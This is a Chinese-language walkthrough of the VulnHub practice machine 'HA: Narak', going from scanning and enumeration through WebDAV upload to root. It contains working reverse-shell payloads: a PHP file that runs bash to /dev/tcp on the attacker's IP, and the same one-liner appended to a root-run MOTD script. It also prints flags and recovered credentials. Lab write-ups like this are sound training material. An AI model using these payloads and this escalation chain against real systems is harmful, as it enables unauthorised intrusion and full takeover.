HA: NARAK
https://www.vulnhub.com/entry/ha-narak,569/
主机发现
# yunki @ yunki in ~/vulnhub/Narak [10:27:26]
$ sudo nmap -sn 192.168.54.0/24
...
...
192.168.54.4
nmap扫描
# yunki @ yunki in ~/vulnhub/Narak [10:29:06]
$ sudo nmap --min-rate 10000 -p- 192.168.54.4 | tee nmap/nmap_port.log
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 10:29 CST
Nmap scan report for 192.168.54.4
Host is up (0.00091s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:EA:A4:51 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.64 seconds
# yunki @ yunki in ~/vulnhub/Narak [10:29:20]
$ sudo nmap -sT -sC -sV -O -p22,80 192.168.54.4 | tee nmap/nmap_sTsCsVO.log
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 10:30 CST
Nmap scan report for 192.168.54.4
Host is up (0.0011s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 71bd592d221eb36b4f06bf83e1cc9243 (RSA)
| 256 f8ec45847f2933b28dfc7d07289331b0 (ECDSA)
|_ 256 d09436960480331040683221cbae68f9 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: HA: NARAK
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 00:0C:29:EA:A4:51 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.85 seconds
# yunki @ yunki in ~/vulnhub/Narak [10:30:44]
$ sudo nmap -sU -p22,80 192.168.54.4 | tee nmap/nmap_sU.log
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 10:31 CST
Nmap scan report for 192.168.54.4
Host is up (0.00046s latency).
PORT STATE SERVICE
22/udp closed ssh
80/udp closed http
MAC Address: 00:0C:29:EA:A4:51 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
目录爆破
# yunki @ yunki in ~/vulnhub/Narak [10:33:24] C:1
$ sudo gobuster dir -u http://192.168.54.4 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt | tee gobuster.log
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.54.4
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/03/27 10:33:35 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 313] [--> http://192.168.54.4/images/]
/webdav (Status: 401) [Size: 459]
/server-status (Status: 403) [Size: 277]
Progress: 218834 / 220561 (99.22%)
===============================================================
2023/03/27 10:34:14 Finished
===============================================================
# yunki @ yunki in ~/vulnhub/Narak [10:34:14]
$ sudo gobuster dir -u http://192.168.54.4 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x rar,zip,sql,txt,html,php | tee gobuster.log
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.54.4
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: rar,zip,sql,txt,html,php
[+] Timeout: 10s
===============================================================
2023/03/27 10:38:37 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 277]
/.php (Status: 403) [Size: 277]
/images (Status: 301) [Size: 313] [--> http://192.168.54.4/images/]
/index.html (Status: 200) [Size: 2998]
/tips.txt (Status: 200) [Size: 58]
/webdav (Status: 401) [Size: 459]
/.html (Status: 403) [Size: 277]
/.php (Status: 403) [Size: 277]
/server-status (Status: 403) [Size: 277]
Progress: 1543821 / 1543927 (99.99%)
===============================================================
2023/03/27 10:43:09 Finished
===============================================================
# yunki @ yunki in ~/vulnhub/Narak [10:44:39]
$ curl http://192.168.54.4/tips.txt
Hint to open the door of narak can be found in creds.txt.
通过查看网站,和图片,最后啥也没有,于是重新扫一下前20个udp端口,
# yunki @ yunki in ~/vulnhub/Narak [10:45:53] C:1
$ sudo nmap -sU --top-ports 20 192.168.54.4
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 10:46 CST
Nmap scan report for 192.168.54.4
Host is up (0.00047s latency).
PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp open|filtered tftp
123/udp closed ntp
135/udp closed msrpc
137/udp open|filtered netbios-ns
138/udp closed netbios-dgm
139/udp open|filtered netbios-ssn
161/udp open|filtered snmp
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp closed isakmp
514/udp open|filtered syslog
520/udp open|filtered route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp open|filtered nat-t-ike
49152/udp closed unknown
MAC Address: 00:0C:29:EA:A4:51 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 7.63 seconds
发现个tftp端口可能是开放的。尝试一下。
tftp
# yunki @ yunki in ~/vulnhub/Narak [10:47:08]
$ tftp 192.168.54.4
tftp> get creds.txt
Received 22 bytes in 0.0 seconds
tftp> quit
# yunki @ yunki in ~/vulnhub/Narak [10:48:50]
$ rm creds.tst
# yunki @ yunki in ~/vulnhub/Narak [10:48:53]
$ cat creds.txt
eWFtZG9vdDpTd2FyZw==
# yunki @ yunki in ~/vulnhub/Narak [10:48:56]
$ cat creds.txt |base64 -d
yamdoot:Swarg%
# yunki @ yunki in ~/vulnhub/Narak [10:49:09]
$ ssh yamdoot@192.168.54.4
The authenticity of host '192.168.54.4 (192.168.54.4)' can't be established.
ECDSA key fingerprint is SHA256:kmwe5y5KKOtKXq8ZF59OU5iq63A++Y9bW2ktl7q+rms.
Are you sure you want to continue connecting (yes/no/[fingerprint])? swarg
Please type 'yes', 'no' or the fingerprint: yes
Warning: Permanently added '192.168.54.4' (ECDSA) to the list of known hosts.
yamdoot@192.168.54.4's password:
Permission denied, please try again.
这里发现不是ssh密码,那就应该是之前的webdav密码。去试试。登录成功,但什么都没有!
尝试davtest
工具。
davtest
# yunki @ yunki in ~/vulnhub/Narak [10:52:35]
$ davtest -url http://192.168.54.4/webdav -auth yamdoot:Swarg
********************************************************
Testing DAV connection
OPEN SUCCEED: http://192.168.54.4/webdav
********************************************************
NOTE Random string for this session: W296ojHZpM85jT
********************************************************
Creating directory
MKCOL SUCCEED: Created http://192.168.54.4/webdav/DavTestDir_W296ojHZpM85jT
********************************************************
Sending test files
PUT cfm SUCCEED: http://192.168.54.4/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.cfm
PUT aspx SUCCEED: http://192.168.54.4/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.aspx
PUT cgi SUCCEED: http://192.168.54.4/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.cgi
PUT html SUCCEED: http://192.168.54.4/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.html
PUT shtml SUCCEED: http://192.168.54.4/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.shtml
PUT jhtml SUCCEED: http://192.168.54.4/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.jhtml
PUT php SUCCEED: http://192.168.54.4/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.php
PUT txt SUCCEED: http://192.168.54.4/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.txt
PUT asp SUCCEED: http://192.168.54.4/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.asp
PUT pl SUCCEED: http://192.168.54.4/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.pl
PUT jsp SUCCEED: http://192.168.54.4/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.jsp
********************************************************
Checking for test file execution
EXEC cfm FAIL
EXEC aspx FAIL
EXEC cgi FAIL
EXEC html SUCCEED: http://192.168.54.4/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.html
EXEC html FAIL
EXEC shtml FAIL
EXEC jhtml FAIL
EXEC php SUCCEED: http://192.168.54.4/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.php
EXEC php FAIL
EXEC txt SUCCEED: http://192.168.54.4/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.txt
EXEC txt FAIL
EXEC asp FAIL
EXEC pl FAIL
EXEC jsp FAIL
********************************************************
/usr/bin/davtest Summary:
Created: http://192.168.54.4/webdav/DavTestDir_W296ojHZpM85jT
PUT File: http://192.168.54.4/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.cfm
PUT File: http://192.168.54.4/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.aspx
PUT File: http://192.168.54.4/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.cgi
PUT File: http://192.168.54.4/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.html
PUT File: http://192.168.54.4/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.shtml
PUT File: http://192.168.54.4/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.jhtml
PUT File: http://192.168.54.4/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.php
PUT File: http://192.168.54.4/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.txt
PUT File: http://192.168.54.4/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.asp
PUT File: http://192.168.54.4/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.pl
PUT File: http://192.168.54.4/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.jsp
Executes: http://192.168.54.4/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.html
Executes: http://192.168.54.4/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.php
Executes: http://192.168.54.4/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.txt
这里可以发现,可以发送php文件,可以执行php文件。那就使用cadaver
上传一个php反弹shell。
cadaver
# yunki @ yunki in ~/vulnhub/Narak [10:52:56]
$ cadaver http://192.168.54.4/webdav
Authentication required for webdav on server `192.168.54.4':
Username: yamdooot
Password:
Authentication required for webdav on server `192.168.54.4':
Username: yamdoot
Password:
dav:/webdav/> ls
Listing collection `/webdav/': succeeded.
Coll: DavTestDir_W296ojHZpM85jT 0 Mar 27 10:52
dav:/webdav/>
获得初始权限shell
# yunki @ yunki in ~/vulnhub/Narak [10:44:50]
$ sudo vim shell.php
[sudo] yunki 的密码:
# yunki @ yunki in ~/vulnhub/Narak [11:02:33]
$ cat shell.php
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.54.128/443 0>&1'");?>
通过cadaver上传php文件。
dav:/webdav/> put /home/yunki/vulnhub/Narak/shell.php
Uploading /home/yunki/vulnhub/Narak/shell.php to `/webdav/shell.php':
Progress: [=============================>] 100.0% of 76 bytes succeeded.
web端打开页面,获得初始shell权限。
# yunki @ yunki in ~/vulnhub/Narak [11:02:36]
$ sudo nc -lnvp 443
listening on [any] 443 ...
connect to [192.168.54.128] from (UNKNOWN) [192.168.54.4] 46834
bash: cannot set terminal process group (494): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/webdav$ whoami
whoami
www-data
www-data@ubuntu:/var/www/webdav$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:ea:a4:51 brd ff:ff:ff:ff:ff:ff
inet 192.168.54.4/24 brd 192.168.54.255 scope global dynamic ens33
valid_lft 1322sec preferred_lft 1322sec
inet6 fe80::20c:29ff:feea:a451/64 scope link
valid_lft forever preferred_lft forever
提权
www-data@ubuntu:/var/www/webdav$ find / -writable -type f 2>/dev/null
www-data@ubuntu:/var/www/webdav$ find / -writable -type f -not -path "/proc/*" -not -path "/sys/*" 2>/dev/null
not -path "/sys/*" 2>/dev/null-path "/proc/*" -n
/mnt/hell.sh
/etc/update-motd.d/91-release-upgrade
/etc/update-motd.d/00-header
/etc/update-motd.d/50-motd-news
/etc/update-motd.d/80-esm
/etc/update-motd.d/80-livepatch
/etc/update-motd.d/10-help-text
/etc/apache2/users.password
/var/www/webdav/DavTestDir_jB1HE8Vub0/davtest_jB1HE8Vub0.asp
/var/www/webdav/DavTestDir_jB1HE8Vub0/davtest_jB1HE8Vub0.shtml
/var/www/webdav/DavTestDir_jB1HE8Vub0/davtest_jB1HE8Vub0.html
/var/www/webdav/DavTestDir_jB1HE8Vub0/davtest_jB1HE8Vub0.aspx
/var/www/webdav/DavTestDir_jB1HE8Vub0/davtest_jB1HE8Vub0.jsp
/var/www/webdav/DavTestDir_jB1HE8Vub0/davtest_jB1HE8Vub0.php
/var/www/webdav/DavTestDir_jB1HE8Vub0/davtest_jB1HE8Vub0.cgi
/var/www/webdav/DavTestDir_jB1HE8Vub0/davtest_jB1HE8Vub0.cfm
/var/www/webdav/DavTestDir_jB1HE8Vub0/davtest_jB1HE8Vub0.pl
/var/www/webdav/DavTestDir_jB1HE8Vub0/davtest_jB1HE8Vub0.txt
/var/www/webdav/DavTestDir_jB1HE8Vub0/davtest_jB1HE8Vub0.jhtml
/var/www/webdav/shell.php
/var/www/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.asp
/var/www/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.aspx
/var/www/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.jsp
/var/www/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.cgi
/var/www/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.pl
/var/www/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.php
/var/www/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.txt
/var/www/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.cfm
/var/www/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.jhtml
/var/www/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.html
/var/www/webdav/DavTestDir_W296ojHZpM85jT/davtest_W296ojHZpM85jT.shtml
/var/www/html/index.html
/var/www/html/style.css
/var/www/html/images/9.jpg
/var/www/html/images/10.jpg
/var/www/html/images/7.jpg
/var/www/html/images/666.jpg
/var/www/html/images/13.jpg
/var/www/html/images/3.jpg
/var/www/html/images/19.jpg
/var/www/html/images/4.jpg
/var/www/html/images/14.jpg
/var/www/html/images/16.jpg
/var/www/html/images/5.jpg
/var/www/html/images/12.jpg
/var/www/html/images/18.jpg
/var/www/html/images/15.jpg
/var/www/html/images/8.jpg
/var/www/html/images/6.jpg
/var/www/html/images/1.jpg
/var/www/html/images/2.jpg
/var/www/html/images/11.jpg
/var/www/html/images/17.jpg
/var/www/html/font.css
/var/www/DavLock
发现了一个hell.sh,查看一下。
www-data@ubuntu:/var/www/webdav$ cat /mnt/hell.sh
cat /mnt/hell.sh
#!/bin/bash
echo"Highway to Hell";
--[----->+<]>---.+++++.+.+++++++++++.--.+++[->+++<]>++.++++++.--[--->+<]>--.-----.++++.
发现是brainfuck语言。那这里使用beef处理一下。
# yunki @ yunki in ~/vulnhub/Narak [9:28:31]
$ beef hell.bf
chitragupt
可能是一个密码?那就去找用户!
www-data@ubuntu:/var/www/webdav$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
narak:x:1000:1000:narak,,,:/home/narak:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
yamdoot:x:1001:1001:,,,:/home/yamdoot:/bin/bash
inferno:x:1002:1002:,,,:/home/inferno:/bin/bash
通过尝试,登录到inferno用户中。
# yunki @ yunki in ~/vulnhub/Narak [9:30:54]
$ ssh narak@192.168.54.4
narak@192.168.54.4's password:
Permission denied, please try again.
narak@192.168.54.4's password:
# yunki @ yunki in ~/vulnhub/Narak [9:31:56] C:130
$ ssh yamdoot@192.168.54.4
yamdoot@192.168.54.4's password:
Permission denied, please try again.
yamdoot@192.168.54.4's password:
# yunki @ yunki in ~/vulnhub/Narak [9:32:05] C:130
$ ssh inferno@192.168.54.4
inferno@192.168.54.4's password:
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
inferno@ubuntu:~$ whoami
inferno
inferno@ubuntu:~$ ls
user.txt
inferno@ubuntu:~$ cat user.txt
Flag: {5f95bf06ce19af69bfa5e53f797ce6e2}
提权到root用户
inferno@ubuntu:~$ find / -writable -type f -not -path "/proc/*" -not -path "/sys/*" 2>/dev/null
/mnt/hell.sh
/home/inferno/.bash_logout
/home/inferno/.bashrc
/home/inferno/.cache/motd.legal-displayed
/home/inferno/.profile
/etc/update-motd.d/91-release-upgrade
/etc/update-motd.d/00-header
/etc/update-motd.d/50-motd-news
/etc/update-motd.d/80-esm
/etc/update-motd.d/80-livepatch
/etc/update-motd.d/10-help-text
inferno@ubuntu:~$ cd /etc/update-motd.d/
inferno@ubuntu:/etc/update-motd.d$ ls
00-header 10-help-text 50-motd-news 80-esm 80-livepatch 91-release-upgrade
inferno@ubuntu:/etc/update-motd.d$ ls -liah
total 36K
131544 drwxrwxrwx 2 root root 4.0K Sep 21 2020 .
131073 drwxr-xr-x 80 root root 4.0K Sep 22 2020 ..
131545 -rwxrwxrwx 1 root root 1.2K Apr 9 2018 00-header
131546 -rwxrwxrwx 1 root root 1.2K Apr 9 2018 10-help-text
131547 -rwxrwxrwx 1 root root 4.2K Apr 9 2018 50-motd-news
131548 -rwxrwxrwx 1 root root 604 Mar 21 2018 80-esm
131549 -rwxrwxrwx 1 root root 3.0K Mar 21 2018 80-livepatch
139440 -rwxrwxrwx 1 root root 299 May 18 2017 91-release-upgrade
inferno@ubuntu:/etc/update-motd.d$ cat 00-header
#!/bin/sh
#
# 00-header - create the header of the MOTD
# Copyright (C) 2009-2010 Canonical Ltd.
#
# Authors: Dustin Kirkland <kirkland@canonical.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
[ -r /etc/lsb-release ] && . /etc/lsb-release
if [ -z "$DISTRIB_DESCRIPTION" ] && [ -x /usr/bin/lsb_release ]; then
# Fall back to using the very slow lsb_release utility
DISTRIB_DESCRIPTION=$(lsb_release -s -d)
fi
printf "Welcome to %s (%s %s %s)\n" "$DISTRIB_DESCRIPTION" "$(uname -o)" "$(uname -r)" "$(uname -m)"
发现,root权限执行了以下命令,那就可以写入咱们的反弹shelll。
inferno@ubuntu:/etc/update-motd.d$ echo "bash -c \"bash -i >& /dev/tcp/192.168.54.128/444 0>&1\"" >> 00-header
inferno@ubuntu:/etc/update-motd.d$ cat 00-header
#!/bin/sh
#
# 00-header - create the header of the MOTD
# Copyright (C) 2009-2010 Canonical Ltd.
#
# Authors: Dustin Kirkland <kirkland@canonical.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
[ -r /etc/lsb-release ] && . /etc/lsb-release
if [ -z "$DISTRIB_DESCRIPTION" ] && [ -x /usr/bin/lsb_release ]; then
# Fall back to using the very slow lsb_release utility
DISTRIB_DESCRIPTION=$(lsb_release -s -d)
fi
printf "Welcome to %s (%s %s %s)\n" "$DISTRIB_DESCRIPTION" "$(uname -o)" "$(uname -r)" "$(uname -m)"
bash -c "bash -i >& /dev/tcp/192.168.54.128/444 0>&1"
然后就是开启444监听,退出重新进ssh。
inferno@ubuntu:/etc/update-motd.d$ exit
logout
Connection to 192.168.54.4 closed.
# yunki @ yunki in ~/vulnhub/Narak [9:41:27] C:130
$ ssh inferno@192.168.54.4
inferno@192.168.54.4's password:
# yunki @ yunki in ~ [9:40:51]
$ sudo nc -lnvp 444
[sudo] yunki 的密码:
listening on [any] 444 ...
connect to [192.168.54.128] from (UNKNOWN) [192.168.54.4] 33594
bash: cannot set terminal process group (1451): Inappropriate ioctl for device
bash: no job control in this shell
root@ubuntu:/# whoami
whoami
root
root@ubuntu:/root# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:ea:a4:51 brd ff:ff:ff:ff:ff:ff
inet 192.168.54.4/24 brd 192.168.54.255 scope global dynamic ens33
valid_lft 1315sec preferred_lft 1315sec
inet6 fe80::20c:29ff:feea:a451/64 scope link
valid_lft forever preferred_lft forever
root@ubuntu:/# cd /root
cd /root
root@ubuntu:/root# ls
ls
root.txt
root@ubuntu:/root# cat r
cat root.txt
██████████████████████████████████████████████████████████████████████████████████████████
█░░░░░░██████████░░░░░░█░░░░░░░░░░░░░░█░░░░░░░░░░░░░░░░███░░░░░░░░░░░░░░█░░░░░░██░░░░░░░░█
█░░▄▀░░░░░░░░░░██░░▄▀░░█░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀▄▀▄▀▄▀▄▀▄▀░░███░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀░░██░░▄▀▄▀░░█
█░░▄▀▄▀▄▀▄▀▄▀░░██░░▄▀░░█░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░░░▄▀░░███░░▄▀░░░░░░▄▀░░█░░▄▀░░██░░▄▀░░░░█
█░░▄▀░░░░░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░████░░▄▀░░███░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░███
█░░▄▀░░██░░▄▀░░██░░▄▀░░█░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░░░▄▀░░███░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░▄▀░░███
█░░▄▀░░██░░▄▀░░██░░▄▀░░█░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀▄▀▄▀▄▀▄▀▄▀░░███░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀▄▀▄▀▄▀▄▀░░███
█░░▄▀░░██░░▄▀░░██░░▄▀░░█░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░▄▀░░░░███░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░▄▀░░███
█░░▄▀░░██░░▄▀░░░░░░▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░█████░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░███
█░░▄▀░░██░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░░░░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░░░█
█░░▄▀░░██░░░░░░░░░░▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀▄▀▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀▄▀░░█
█░░░░░░██████████░░░░░░█░░░░░░██░░░░░░█░░░░░░██░░░░░░░░░░█░░░░░░██░░░░░░█░░░░░░██░░░░░░░░█
██████████████████████████████████████████████████████████████████████████████████████████
Root Flag: {9440aee508b6215995219c58c8ba4b45}
!! Congrats you have finished this task !!
Contact us here:
Hacking Articles : https://twitter.com/hackinarticles
Jeenali Kothari : https://www.linkedin.com/in/jeenali-kothari/
+-+-+-+-+-+ +-+-+-+-+-+-+-+
|E|n|j|o|y| |H|A|C|K|I|N|G|
+-+-+-+-+-+ +-+-+-+-+-+-+-+
__________________________________